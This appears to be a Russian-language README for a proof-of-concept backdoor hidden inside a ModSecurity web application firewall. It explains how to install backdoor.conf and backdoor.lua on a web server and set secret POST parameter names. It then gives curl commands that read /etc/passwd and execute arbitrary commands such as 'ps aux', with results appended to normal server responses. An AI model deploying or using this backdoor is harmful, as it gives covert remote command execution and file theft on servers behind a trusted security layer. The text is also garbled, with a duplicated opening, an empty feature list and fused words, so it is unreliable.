
Это proof-of-concept вредоносного программного обеспечения, работающего внутри WAF ModSecurity.
Это доказательство концепции вредоносного ПО, работающего внутри ModSecurity WAF.
Программное обеспечение имеет две основные функции:
Дополнительно оно включает следующие функции:
SecStreamOutBodyInspection и SecContentInjection
установлены в OnВозьмите файлы backdoor.conf и backdoor.lua и загрузите первый из них в
веб-сервер.
Конфигурацию можно задать в первом правиле файла backdoor.conf.
Этот параметр можно использовать для задания имени POST-аргумента, используемого для получения
содержимого файлов. Задайте ему любое случайное значение, например koomem6Shmog.
Этот параметр можно использовать для задания имени POST-аргумента, используемого для выполнения
команд. Задайте ему любое случайное значение, например tys4Olhuibves.
Команды можно выполнять на любом адресе (домене) целевого сервера, находящегося за ModSecurity WAF. Вывод команд добавляется к стандартному ответу сервера.
Получение содержимого файла:
curl -X POST -d "koomem6Shmog=/etc/passwd" "http://example.com/"
Выполнение команды и получение вывода:
curl -X POST -d "tys4Olhuibves=/bin/ps aux" "http://example.com/"
Copyright (c) 2022 Jozef Sudolsky. Все права защищены.
"THE BEER-WARE LICENSE" (Ревизия 42): [email protected] написал этот файл. Пока вы сохраняете это уведомление, вы можете делать с этим материалом всё, что захотите. Если мы когда-нибудь встретимся, и вы посчитаете, что эта вещь того стоит, вы можете угостить меня пивом в ответ. Jozef Sudolsky